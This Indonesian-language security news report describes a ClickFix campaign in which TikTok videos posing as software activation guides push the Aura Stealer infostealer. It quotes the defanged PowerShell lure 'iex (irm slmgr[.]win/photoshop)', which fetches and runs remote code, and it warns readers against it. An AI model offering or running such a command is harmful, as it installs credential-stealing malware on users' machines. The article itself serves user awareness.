Video TikTok Sebarkan Malware Pencuri Data Lewat Serangan ClickFix
Serangkaian video berbahaya di TikTok kembali menjadi media penyebaran malware pencuri informasi (infostealer) dengan menyamar sebagai panduan aktivasi gratis untuk berbagai perangkat lunak populer seperti Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, Discord Nitro, bahkan layanan fiktif seperti Netflix Premium dan Spotify Premium.
Menurut laporan Xavier Mertens dari ISC Handler, kampanye ini mirip dengan serangan yang sebelumnya diamati oleh Trend Micro pada Mei lalu. Video-video tersebut menggunakan teknik rekayasa sosial yang dikenal sebagai ClickFix attack, yaitu metode yang menipu pengguna untuk menjalankan perintah tertentu di sistem mereka sehingga secara tidak sadar mengunduh dan mengeksekusi malware.
Modus Operandi: Perintah Satu Baris yang Menjebak
Dalam setiap video, pelaku menampilkan perintah satu baris yang tampak seperti instruksi resmi dan meminta pengguna untuk menyalinnya ke PowerShell dengan hak administrator. Contohnya:
iex (irm slmgr[.]win/photoshop)
Nama program pada URL bervariasi tergantung pada aplikasi yang diklaim “diaktifkan.” Misalnya, video yang meniru aktivasi Windows akan menggunakan “windows” sebagai ganti “photoshop.”
Ketika perintah tersebut dijalankan, PowerShell akan terhubung ke situs slmgr[.]win untuk mengambil skrip tambahan, yang kemudian mengunduh dua berkas eksekusi berbahaya dari halaman Cloudflare Pages.
Aura Stealer dan Payload Tambahan
Berkas pertama, updater.exe, diketahui merupakan varian dari Aura Stealer, malware pencuri data yang dapat menyalin kredensial tersimpan di browser, cookie autentikasi, dompet kripto, hingga informasi login dari berbagai aplikasi. Semua data tersebut kemudian dikirim ke server milik pelaku untuk digunakan dalam pencurian akun atau dana korban.
Selain itu, skrip juga mengunduh source.exe, yang digunakan untuk mengompilasi kode berbahaya secara lokal menggunakan compiler Visual C# (csc.exe) bawaan .NET, lalu menjalankannya langsung di memori sistem. Tujuan akhir dari payload tambahan ini belum dapat dipastikan, namun berpotensi menanamkan modul lain seperti backdoor atau keylogger.
Peringatan bagi Pengguna
Pengguna yang sudah menjalankan perintah tersebut sebaiknya segera menganggap seluruh kredensial mereka telah bocor, mengganti semua kata sandi di layanan penting, serta memindai perangkat dengan perangkat lunak keamanan terkini.
Serangan ClickFix semakin populer sepanjang tahun ini karena efektivitasnya dalam menipu pengguna awam. Teknik ini juga telah digunakan untuk menyebarkan berbagai malware lain, termasuk yang terkait dengan kampanye ransomware dan pencurian aset kripto.
Sebagai aturan umum, pengguna tidak boleh menyalin dan menjalankan perintah dari internet di PowerShell, Command Prompt, Terminal macOS, maupun shell Linux, terutama jika perintah tersebut berasal dari video atau situs yang tidak resmi.
Sumber: BleepingComputer
